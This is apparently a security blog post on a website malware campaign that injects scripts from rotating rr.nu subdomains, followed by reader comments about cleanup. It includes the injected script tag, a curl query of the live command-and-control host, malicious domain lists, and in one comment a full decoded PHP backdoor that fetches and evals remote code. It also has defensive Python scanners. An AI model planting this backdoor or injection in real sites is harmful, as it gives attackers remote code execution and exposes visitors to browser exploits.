Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware loaded from random hostnames under rr.nu (a second-level domain under the .nu TLD, not a TLD of its own).

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it performs another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (again a random domain, but always with the parameters h=1&s=pmg), which then attempts to exploit the visitor’s browser using multiple exploit kits.


Those domains change daily, but they always point to 194.28.114.103. What is interesting is that the compromised sites also have a backdoor that calls http://www.lilypophilypop.com/g_load.php (their command and control) to get the new list of domains to inject.

A quick query of this site shows the current live domains:

$ curl -sq http://www.lilypophilypop.com/g_load.php
http://uotes98satur.rr.nu/
http://ixeld52erlya.rr.nu/
http://ile68depa.rr.nu/
http://cie69svoi.rr.nu/
http://ues02the.rr.nu/
http://ordonv12ectorct.rr.nu/
http://ngv83ete.rr.nu/
http://waranc72hexcit.rr.nu/
http://ereaso88nsphas.rr.nu/
http://erbac03klogwi.rr.nu/
http://rtfall80shesdo.rr.nu/
http://mitexp80ressman.rr.nu/
http://tingst30iffles.rr.nu/
http://ford53blue.rr.nu/
http://trill18ionsa.rr.nu/

Here are the domains we have found so far:

aising32austral.rr.nu
anc57erid.rr.nu
ancisc11oretai.rr.nu
arcot97icscch.rr.nu
asu31ryc.rr.nu
atio79srem.rr.nu
ban85kmak.rr.nu
bea90utym.rr.nu
cdeter66minatio.rr.nu
chelpo94landsa.rr.nu
chread73erspar.rr.nu
cie69svoi.rr.nu
dend21ange.rr.nu
deunce68rtaint.rr.nu
dsadva20ntages.rr.nu
eacti41vities.rr.nu
ectors56rushedb.rr.nu
edu11tch.rr.nu
enc89efo.rr.nu
ent70als.rr.nu
ents14publ.rr.nu
erbac03klogwi.rr.nu
ereaso88nsphas.rr.nu
ers49sup.rr.nu
esed94ownu.rr.nu
evaryc13ornerf.rr.nu
ffs06dive.rr.nu
ford53blue.rr.nu
ged20sha.rr.nu
gerd84eckpa.rr.nu
ghl07evel.rr.nu
ibl42efar.rr.nu
ile68depa.rr.nu
ime27glim.rr.nu
ingin64terac.rr.nu
insist18suspen.rr.nu
irdcap79turedre.rr.nu
irstde24clined.rr.nu
iss79ione.rr.nu
itioni67nggene.rr.nu
itsd81evic.rr.nu
ive49scor.rr.nu
ixeld52erlya.rr.nu
jitsu17quakec.rr.nu
king35dayv.rr.nu
lanne44rsacqu.rr.nu
lia82tio.rr.nu
llyim30munity.rr.nu
mitexp80ressman.rr.nu
mputer94izeduni.rr.nu
nadap83artic.rr.nu
ncello05rjuice.rr.nu
ncho61ragef.rr.nu
ngbe82ntse.rr.nu
ngv83ete.rr.nu
nhanc79emayb.rr.nu
nic99wel.rr.nu
nlygpa40rentsre.rr.nu
nom21iesa.rr.nu
nwin54simpl.rr.nu
odity02prince.rr.nu
omist96smoto.rr.nu
onmyse88lfadvis.rr.nu
onth92send.rr.nu
ordonv12ectorct.rr.nu
orkic86kedgra.rr.nu
oul44dbe.rr.nu
pital40relat.rr.nu
quic34kprog.rr.nu
rcles12mainde.rr.nu
renw05insim.rr.nu
rie21rcom.rr.nu
rin43gco.rr.nu
roduc37edter.rr.nu
rpo66rat.rr.nu
rtfall80shesdo.rr.nu
rwest23pasto.rr.nu
sba15gsed.rr.nu
ssurem70ountai.rr.nu
sup01port.rr.nu
syste98msman.rr.nu
tarian13cheese.rr.nu
tel90yget.rr.nu
terda31ytime.rr.nu
tfo04lio.rr.nu
tin04gobs.rr.nu
tingst30iffles.rr.nu
tomoti62veform.rr.nu
trill18ionsa.rr.nu
ttr92acte.rr.nu
ublic19ations.rr.nu
ues02the.rr.nu
untyh37umane.rr.nu
uotes98satur.rr.nu
vesc01hang.rr.nu
vesr27epla.rr.nu
waranc72hexcit.rr.nu

We will post more details as we keep monitoring the campaign.
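What a site owner can check for both halves of this (the footer tag in served pages, and the base64 stub prepended to PHP files that produces it) is shown in the following Python scanner. It is an added example written for this page, not Sucuri’s sitecheck and not the rrnuVaccine script mentioned in the comments. The sample HTML and PHP it runs on are constructed, with the rr.nu footer tag and the g_load.php C2 host taken from the post; the stub removal assumes the injector placed a single eval(base64_decode(...)) statement at the top of the file inside its own <?php ... ?> pair.

```python
"""Scanner for the two artefacts of the .rr.nu campaign: the footer <script> tag
in served pages and the eval(base64_decode()) stub prepended to PHP files that
produces it. Added example for this page, not Sucuri's sitecheck and not the
rrnuVaccine script from the comments. All sample inputs below are constructed.
"""
import base64
import os
import re
from typing import Optional

# The tag loads from a random label under rr.nu; match *.rr.nu rather than the
# fixed list in the post, because the labels rotate daily.
RR_NU_URL = re.compile(r'^https?://[a-z0-9.-]+\.rr\.nu/', re.I)
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?\s*(https?://[^"\'\s>]+)', re.I)
# The backdoor is a single eval(base64_decode('...')) statement at the top of the file.
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?')
URL = re.compile(r'https?://[A-Za-z0-9.-]+/[A-Za-z0-9._/?=&-]*')
# Names used by the decoded backdoor quoted in the comments, plus the C2 path.
MARKERS = ('mr_no', 'mrobh', '_777', 'g_load.php')
HEAD = 8192  # only the start of a file is examined for the stub


def injected_rr_nu_scripts(html: str) -> list:
    """src URLs of <script> tags that load from an rr.nu host."""
    return [src for src in SCRIPT_SRC.findall(html) if RR_NU_URL.match(src)]


def decode_eval_stub(php: str) -> Optional[str]:
    """Decoded body of a leading eval(base64_decode(...)) stub, or None."""
    m = EVAL_B64.search(php[:HEAD])
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('latin-1')
    except ValueError:
        return None


def backdoor_indicators(php: str) -> dict:
    """Decode the stub and report the URLs and known names it contains."""
    decoded = decode_eval_stub(php)
    if decoded is None:
        return {'infected': False, 'urls': [], 'markers': []}
    return {'infected': True,
            'urls': sorted(set(URL.findall(decoded))),
            'markers': [m for m in MARKERS if m in decoded]}


def strip_eval_stub(php: str) -> str:
    """Return the file without the stub. Only the first match within the leading
    bytes is removed, so legitimate base64_decode() calls further down are kept.
    Assumes the injector wrapped the stub in its own '<?php ... ?>' pair."""
    m = EVAL_B64.search(php[:HEAD])
    if not m:
        return php
    cleaned = php[:m.start()] + php[m.end():]
    return re.sub(r'^<\?php\s*\?>\s*', '', cleaned, count=1)


def scan_tree(root: str) -> dict:
    """Walk a document root and map each suspicious file to its findings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding='latin-1') as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = {}
            if name.endswith(('.php', '.html', '.htm')):
                tags = injected_rr_nu_scripts(text)
                if tags:
                    hits['rr_nu_script'] = tags
            if name.endswith('.php'):
                bd = backdoor_indicators(text)
                if bd['infected']:
                    hits['backdoor'] = bd
            if hits:
                findings[path] = hits
    return findings


# Constructed samples: the footer tag as quoted in the post, and a stub whose
# decoded body names the C2 from the post (the real stub is several KB).
SAMPLE_HTML = ('<html><body><p>hello</p>\n'
               '<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>\n'
               '</body></html>')
CLEAN_HTML = '<html><body><script src="https://example.com/app.js"></script></body></html>'
ORIGINAL_PHP = '<?php\n// original file contents follow\necho "hi";\n'
_PAYLOAD = ("if(!isset($_SERVER['mr_no'])){$_SERVER['mr_no']=1;"
            "$_SERVER['s_a1']='http://www.lilypophilypop.com/g_load.php';"
            "$_SERVER['s_script']='nl.php?p=d';ob_start('mrobh');}")
SAMPLE_PHP = ('<?php eval(base64_decode("%s")); ?>'
              % base64.b64encode(_PAYLOAD.encode()).decode()) + ORIGINAL_PHP

if __name__ == '__main__':
    print(injected_rr_nu_scripts(SAMPLE_HTML))
    print(backdoor_indicators(SAMPLE_PHP))
    print(strip_eval_stub(SAMPLE_PHP) == ORIGINAL_PHP)
```

Scanning the files on disk with scan_tree() is the more reliable check: the footer tag only appears in the served HTML for some visitors, so a fetch from a scanner that is not served the tag will look clean even when the stub is present in every PHP file.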

Let us know in the comments below if you have any questions.

62 comments
  1. Just found this while testing some CSS on a WordPress install that has been sitting around for a while. Any idea what the likely attack vector was? Thought I was running at least a vaguely tight ship. 

    1.  I’m in the same boat, trying to remove some outdated files now and might try Walker’s script.

  2. My wordpress blog got compromised by this campaign, seemingly via an outdated version of the wp-spamfree plugin (which I can’t even remember installing but it’s possible I did). I manually removed the plugin and upgraded WP to the latest version and that seems to have done the trick.

  3. I’ve got this, as well as a nice chunk of base64-decode code at the beginning of all my php files. I’ve removed that all and upgraded WordPress. I am still getting the redirect script in my footer though. Strangely, it only works in IE. Chrome doesn’t load it.

    1. Couple links that might be of use:

      http://codex.wordpress.org/FAQ_My_site_was_hacked

      https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html — see section 3, cleaning up WordPress.

      What I’ve done so far is basically what they recommend:
      – Back up database
      – Back up files
      – Change MySQL user password
      – Reinstall WordPress (I did this manually but you may be able to do this via the admin panel)
      – Fix/reinstall theme, plugins, etc

      Quite a pain…

      1. I have actually done this, and two days after my theme files were infected again (I changed the FTP password as well).

        Anyone knows how they are getting in? I don’t want to keep cleaning my site when I don’t know how to close the hole they get in through.

        Seems like we’re all on Dreamhost, so maybe it’s something on their network. This will make it really hard for us to fix ourselves.

  4. Finishing a PHP script to clean all infected PHP files, tested. Will take more tests, and will share on GitHub soon..

        1. New release: v0.2 beta. Now based on a regex search engine, catches more variations. http://t.co/vYdLHJuQ

    1.  It came back.. and this time it’s not working for me at all.  Any suggestions?  I have many sites and 10s of thousands of files that are infected.

    2.  I installed rrnuVaccine.php on our web site and ran it.  All it did was take my browser to your web site.  Am I missing something?

      Thanks

      Regards,
      Doug

      1. I was also getting redirected to Sucuri. It appeared that I had just right-clicked on rrnuVaccine.php, clicked on Save and uploaded it to the site. In fact, we have to copy the actual code and save it in Notepad as an rrnuVaccine.php file, then upload it. Hope it helps other noobs like me.

  5. My Joomla websites were hacked. Walker’s script did not do the trick for cleaning up the files.  Any mods that would allow this script to work for me? 

      1. Hi Alaina, I have detected another variety of string, and I’m adjusting the code to search for more strings…

        You can update rrnuVaccine.php on line 125 with your “infected string”; it appears at the beginning of the files, on the same line.

        Share one infected file with me via Pastebin and I will add the string in the next version, OK?

        1.  I can’t believe I didn’t try this.  It worked for me on my 2nd hacked site.  Is there a way to make it go down one directory?  For example, right now I copy it to my /home/user/website directory, but I have many sites, so is there a way it can start scanning at /home/user/ ?  I am not too familiar with PHP.

          1. I found the backdoor r.php and rr.php buried deep within my wp-content/uploads directory, multiple instances too. Found it; running the file, it comes up clean, but if you look at the code you will recognize it. Script works great cleaning the site.

    1. Did it give you any errors or did it just not run?  There is a specific string it is looking for that exists at the top of each of your infected pages, something like “eval(base64_decode…[bunch of characters]”  

      This string is specified near the bottom of Walker’s script.  I’m speculating, but it may be possible that you have a different variety of the malware with a different string signature.  See if you can find an example infected page and compare the strings.  This tool was helpful in identifying infected pages.  http://sitecheck.sucuri.net/scanner/

  6. Have you any text to include for the robots.txt on our websites? Is there any type of robotics they are using that we can phase out? I put a robots text on my desktop and it seems to function, even for others.

  7. I also got this, from a domain that is not on your list — ingg93rant dot rr dot nu.

  8. Is there any way of telling what their mode of operation is... how or where they found the vulnerability that allowed them to get in to your website, and what options are available to secure your site better after an attack?

  9. One of my sites was affected.  I noticed some entries in my information_schema MySQL database.

    How do I remove them?  Is information_schema a standard part of all WordPress MySQL installs?  If so, is it modified by specific themes?

    SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE '%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%'
    OR `USER` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `HOST` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `DB` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `COMMAND` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `TIME` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `STATE` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%'
    OR `INFO` LIKE '%src="http://rmore79riveru.rr.nu/nl.php?p=d">%')
    LIMIT 0, 30

    EXPLAIN SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE '%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%'
    OR `USER` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `HOST` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `DB` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `COMMAND` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `TIME` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `STATE` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%'
    OR `INFO` LIKE '%src="http://nia91nskg.rr.nu/nl.php?p=d">%')

  10. Seems like everyone I’ve spoken to who has been affected by this is on DreamHost. Not sure yet whether it’s just a coincidence… 

    1. I’m also on DreamHost.  I contacted them about it and they sent me a list of all of the files that they showed as being infected.  Only the WordPress databases were affected for me.  I have a few other directories and those files were unaffected.

      1. All of my .PHP files were (are) infected. It seems to come back every day now. I’m assuming my databases are infected too; how did you clean the DBs? The DreamHost guy gave me an SSH shell command to run which will apparently remove the bad code. I’ll see if that works, but the cause will obviously still be there.

  11. Walker de Alencar, you are a badass!

    So I am a security idiot… for others like me that get screwed by this, here is the explanation / answer I have figured out so far.

    1. Your site gets a malware notice, especially in IE. I am on a Mac and did not get it. 

    2. When you view source your page, just before the closing body tag you see a script directing to an rr.nu domain. Such as

    But when you look at the actual code on the server page (not your local files, obviously) you do not see it, but wait… there is now a ton of junk code at the top in a PHP line.

    3. This code is a base64 string and will resemble:

    4. When this is decoded, it really reads as: 

    // Decoded backdoor, reformatted for readability. Characters the comment system
    // stripped (backslashes in "\n", the <script> tag literal in gml_777(), the
    // </body> regex in mrobh()) are restored from the surrounding code and from
    // the footer tag shown in the post.
    if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){
      $_SERVER['mr_no']=1;
      if(!function_exists('mrobh')){
        // Fetch a URL with whichever transport the host allows.
        function get_tds_777($url){
          $content="";
          $content=@trycurl_777($url);if($content!==false)return $content;
          $content=@tryfile_777($url);if($content!==false)return $content;
          $content=@tryfopen_777($url);if($content!==false)return $content;
          $content=@tryfsockopen_777($url);if($content!==false)return $content;
          $content=@trysocket_777($url);if($content!==false)return $content;
          return '';
        }
        function trycurl_777($url){
          if(function_exists('curl_init')===false)return false;
          $ch=curl_init();
          curl_setopt($ch,CURLOPT_URL,$url);
          curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
          curl_setopt($ch,CURLOPT_TIMEOUT,5);
          curl_setopt($ch,CURLOPT_HEADER,0);
          $result=curl_exec($ch);
          curl_close($ch);
          if($result=="")return false;
          return $result;
        }
        function tryfile_777($url){
          if(function_exists('file')===false)return false;
          $inc=@file($url);
          $buf=@implode('',$inc);
          if($buf=="")return false;
          return $buf;
        }
        function tryfopen_777($url){
          if(function_exists('fopen')===false)return false;
          $buf='';
          $f=@fopen($url,'r');
          if($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;
          if($buf=="")return false;
          return $buf;
        }
        function tryfsockopen_777($url){
          if(function_exists('fsockopen')===false)return false;
          $p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];
          $f=@fsockopen($host,80,$errno,$errstr,30);
          if(!$f)return false;
          $request="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";
          fwrite($f,$request);
          $buf='';
          while(!feof($f)){$buf.=fread($f,10000);}
          fclose($f);
          if($buf=="")return false;
          list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf); // drop the HTTP headers
          return $buf;
        }
        function trysocket_777($url){
          if(function_exists('socket_create')===false)return false;
          $p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];
          $ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1));
          if($ip1!=$ip2)return false; // name did not resolve to an address
          $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
          if(!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}
          $request="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";
          socket_write($sock,$request);
          $buf='';
          while($t=socket_read($sock,10000)){$buf.=$t;}
          @socket_close($sock);
          if($buf=="")return false;
          list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);
          return $buf;
        }
        // Ask the C2 (s_a1, then s_a2 as fallback) for the current domain list,
        // cache it, and eval() any PHP the C2 appends after the |||CODE||| marker.
        function update_tds_file_777($tdsfile){
          $actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];
          $val=get_tds_777($actual1);
          if($val=="")$val=get_tds_777($actual2);
          $f=@fopen($tdsfile,"w");
          if($f){@fwrite($f,$val);@fclose($f);}
          if(strstr($val,"|||CODE|||")){
            list($val,$code)=explode("|||CODE|||",$val);
            eval(base64_decode($code));
          }
          return $val;
        }
        // Pick a random domain from the cached list, refreshing it every s_t1 seconds.
        function get_actual_tds_777(){
          $defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];
          $tdsfile=$dir."log1.txt";
          if(@file_exists($tdsfile)){
            $mtime=@filemtime($tdsfile);$ctime=time()-$mtime;
            if($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}
            else{$content=@file_get_contents($tdsfile);}
          }else{$content=update_tds_file_777($tdsfile);}
          $tds=@explode("\n",$content);
          $c=@count($tds)+0;
          $url=$defaultdomain;
          if($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}
          return $url;
        }
        function is_mac_777($ua){
          $mac=0;
          if(stristr($ua,"mac")||stristr($ua,"safari"))
            if((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;
          return $mac;
        }
        function is_msie_777($ua){
          $msie=0;
          if(stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;
          return $msie;
        }
        // Create the .logs/ cache directory, classify the visitor, and stash the
        // C2 settings in $_SERVER so the other functions can reach them.
        function setup_globals_777(){
          $rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";
          if(!is_dir($rz)){
            @mkdir($rz);
            if(is_dir($rz)){$mz=$rz;}
            else{
              $rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";
              if(!is_dir($rz)){@mkdir($rz);if(is_dir($rz)){$mz=$rz;}}
              else{$mz=$rz;}
            }
          }else{$mz=$rz;}
          $bot=0;
          $ua=$_SERVER['HTTP_USER_AGENT'];
          if(stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;
          if(stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;
          $msie=0;if(is_msie_777($ua))$msie=1;
          $mac=0;if(is_mac_777($ua))$mac=1;
          if(($msie==0)&&($mac==0))$bot=1; // anything but IE 6-9 or Mac is treated as a bot
          global $_SERVER;
          $_SERVER['s_p1']=$mz;
          $_SERVER['s_b1']=$bot;
          $_SERVER['s_t1']=1200;
          $_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/";
          $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);
          $_SERVER['s_a1']='http://www.mrsmtihinfo.ru/g_load.php'.$d;
          $_SERVER['s_a2']='http://www.cooperjsutf8.ru/g_load.php'.$d;
          $_SERVER['s_script']="nl.php?p=d";
        }
        setup_globals_777();
        if(!function_exists('gml_777')){
          // The tag to inject; empty for "bots". The tag literal was stripped by the
          // comment system and is reconstructed from s_script and the footer tag above.
          function gml_777(){
            $r_string_777='';
            if($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"></script>';
            return $r_string_777;
          }
        }
        if(!function_exists('gzdecodeit')){
          // Inflate a gzip body so the tag can be inserted even when output is compressed.
          function gzdecodeit($decode){
            $t=@ord(@substr($decode,3,1));
            $start=10;$v=0;
            if($t&4){$str=@unpack('v',substr($decode,10,2));$str=$str[1];$start+=2+$str;}
            if($t&8){$start=@strpos($decode,chr(0),$start)+1;}
            if($t&16){$start=@strpos($decode,chr(0),$start)+1;}
            if($t&2){$start+=2;}
            $ret=@gzinflate(@substr($decode,$start));
            if($ret===FALSE){$ret=$decode;}
            return $ret;
          }
        }
        // Output-buffer callback: insert the tag just before </body> (regex reconstructed).
        function mrobh($content){
          @Header('Content-Encoding: none');
          $decoded_content=gzdecodeit($content);
          if(preg_match('/<\/body/si',$decoded_content)){
            return preg_replace('/(<\/body[^>]*>)/si',gml_777()."\n".'$1',$decoded_content);
          }else{
            return $decoded_content.gml_777();
          }
        }
        ob_start('mrobh');
      }
    }

    5. I have not done much investigating into these sites, but the script redirects to random URLs all pointing to an IP address 194.28.114.103 in F’ing Moldova (I had to look it up, a country between Ukraine and Romania). So when the code that is inserted into all PHP and HTML pages is decoded, it appears http://sweepstakesandcontestsdo.com , http://www.mrsmtihinfo.ru , http://www.cooperjsutf8.ru are the culprits. I hope someone can do something about these jackasses. 

    6. I was running a current and totally updated version of WordPress when it was hacked.
    a) deactivate all plugins, and update them
    b) update WordPress network
    c) update theme if valid
    d) in general, strip everything down as much as possible and update what you can
    e) check your .htaccess file; go get it from your remote server and remove the junk, and check your permissions are 644; you can do this through cPanel.
    f) change your FTP user password, AND be sure to change your connection method on whatever FTP client you use to “SFTP”
    g) check your WordPress admin users to make sure you are aware of all admin accounts; change passwords

    7. Go to https://github.com/walkeralencar/rrnuVaccine and copy the PHP code from Walker’s script into a new PHP file, 

    NOTE: before uploading, and this is the key to make it work for you, as the base64 junk in your page will likely be slightly different from various mutations of this malware bull… “Get” a copy of an infected page and copy all the code from:

    and paste your garbage code over Walker’s script code (beginning on line 125)

    8. Save and upload it on the root of your site (where the wp-config file is) and run it through the browser. I had over 2,000 files disinfected. Go to http://sitecheck.sucuri.net/scanner/ and scan your URL (if you have done this prior, you will see cached results, even if you hit the browser refresh button) be sure to hit the “rescan” button at the bottom of the site. I am all clear now!

    9. Not sure yet where the actual vulnerability is and I expect this to come back, but at least I can clean it now in moments, thanks to Walker, as I keep figuring it out. On to further investigate and search “Harden WordPress”… I’ll update with more as I learn. 

    1. ok so code snippets were stripped out in my reply, if you need them, just holler for details.
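The decoded code in the comment above only injects the tag for some visitors, which is why one reader saw it in IE but not in Chrome. The following Python re-implementation of that gating and of the domain-list handling is an added example for this page, not the malware itself and not Sucuri’s or Walker’s code; the user agents and the cached list it runs on are constructed. It mirrors is_msie_777(), is_mac_777(), the bot check in setup_globals_777(), the |||CODE||| split in update_tds_file_777() and the random pick in get_actual_tds_777(), and shows where the .logs/log1.txt file that another commenter found comes from.

```python
"""Python re-implementation of the visitor gating and domain-list handling in
the decoded PHP backdoor above. Added example for illustration, not the malware
itself and not Sucuri's code. The user agents and the cached list are constructed.
"""
import random

BOT_MARKERS = ('msnbot', 'yahoo', 'bingbot', 'google')   # setup_globals_777()
DEFAULT_TDS = 'http://sweepstakesandcontestsdo.com/'      # $_SERVER['s_d1']
SCRIPT_PATH = 'nl.php?p=d'                                # $_SERVER['s_script']
CACHE_TTL = 1200                                          # $_SERVER['s_t1'], seconds
CACHE_FILE = '.logs/log1.txt'                             # under DOCUMENT_ROOT


def is_msie(ua: str) -> bool:
    """is_msie_777(): only IE 6 to 9 count; stristr() is case-insensitive."""
    u = ua.lower()
    return any(('msie %d' % v) in u for v in (6, 7, 8, 9))


def is_mac(ua: str) -> bool:
    """is_mac_777(): 'mac' or 'safari' in the UA, unless 'windows' or 'iphone' is too."""
    u = ua.lower()
    return ('mac' in u or 'safari' in u) and 'windows' not in u and 'iphone' not in u


def treated_as_bot(ua: str) -> bool:
    """The s_b1 flag: crawlers, plus anyone who is neither IE 6-9 nor on a Mac."""
    u = ua.lower()
    if any(marker in u for marker in BOT_MARKERS):
        return True
    return not (is_msie(ua) or is_mac(ua))


def split_code_channel(c2_response: str):
    """update_tds_file_777(): the C2 reply is a domain list, optionally followed
    by '|||CODE|||' and base64 PHP that the backdoor eval()s. Returns (list, code)."""
    if '|||CODE|||' in c2_response:
        domain_list, code = c2_response.split('|||CODE|||', 1)
        return domain_list, code
    return c2_response, None


def cache_needs_refresh(cache_mtime: int, now: int, ttl: int = CACHE_TTL) -> bool:
    """get_actual_tds_777(): the cache is re-fetched once older than s_t1 seconds."""
    return now - cache_mtime > ttl


def pick_tds_host(cached_list: str, default: str = DEFAULT_TDS, rng=random) -> str:
    """get_actual_tds_777(): one random line from the cache. The PHP uses
    mt_rand(0, count-2), so it never picks the last element, which is the empty
    string left after the list's trailing newline."""
    lines = cached_list.split('\n')
    if len(lines) > 1:
        return lines[rng.randint(0, len(lines) - 2)].strip()
    return default


def injected_tag(ua: str, cached_list: str, rng=random) -> str:
    """gml_777(): the tag mrobh() inserts before </body>, or '' for 'bots'."""
    if treated_as_bot(ua):
        return ''
    return '<script src="%s%s"></script>' % (pick_tds_host(cached_list, rng=rng), SCRIPT_PATH)


# Constructed inputs for demonstration.
UA_IE8 = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)'
UA_CHROME_WIN = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0 Safari/535.19'
UA_FIREFOX_LINUX = 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0'
UA_MAC_SAFARI = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7) AppleWebKit/534.57 Safari/534.57'
UA_GOOGLEBOT = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
CACHED_LIST = 'http://uotes98satur.rr.nu/\nhttp://ixeld52erlya.rr.nu/\n'

if __name__ == '__main__':
    for ua in (UA_IE8, UA_CHROME_WIN, UA_FIREFOX_LINUX, UA_MAC_SAFARI, UA_GOOGLEBOT):
        print('%-60s -> %r' % (ua[:60], injected_tag(ua, CACHED_LIST)))
```

Two practical consequences follow from this logic: a scanner that fetches the page with a Firefox or Chrome-on-Windows user agent is classified as a bot and gets a clean page, so remote checks need an IE 6-9 user agent or, better, a look at the files themselves; and a populated .logs/log1.txt under the document root is a sign that the backdoor has already talked to its C2.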

  12. I’m trying to use Walker’s script, but it returns this when I try to run it:

    Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 8

    Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 14

    Parse error: syntax error, unexpected T_CLASS in /blog/rrnuVaccine.php on line 15

    Any ideas on how to make it work?

  13. rrnu Vaccine v0.2 beta on github: http://t.co/vYdLHJuQ

    Regex based, now detects more variants.

  14. Hi, today I’ve found inside my WP site (hosted on Site5, London server) a directory called “.logs” and in there a txt file with a list of rr.nu subdomains. What does it mean?

      1. But if I run https://github.com/walkeralencar/rrnuVaccine and then I delete that directory, am I ok?
        I found the infection started from a wordpress plugin, eshop-languages. Sigh!

        1. Perhaps… The problem is that it can be hard to identify yourself if you’re not a tech wiz. Even though I have a long background with computers, I still ended up buying one of Sucuri’s packages (and everything was dandy fine an hour later)

          1.  Now it’s easy, you don’t need to identify the infection string. v0.2 beta is regex based.

            Just put it in the root dir and run the script 😉

  15. I don’t know what we would have done without Sucuri.  All sites are now stable, I have a few of our staging sites that continue to get infected.  After 2 long years of dealing with this, Sucuri.net has literally saved dozens of our clients’ sites.  YOU GUYS ARE THE BEST.

    Cherie Young

    1. I have just encountered a pretty stubborn bit of this hacking and was looking around for things to help. Your article was very informative, thanks.

  16. How can I remove it. I looked into my footer.php and source code and I can’t find it. But, when I scanned my site using sucuri.net, you were able to detect it, but don’t show where it’s located exactly. 🙁
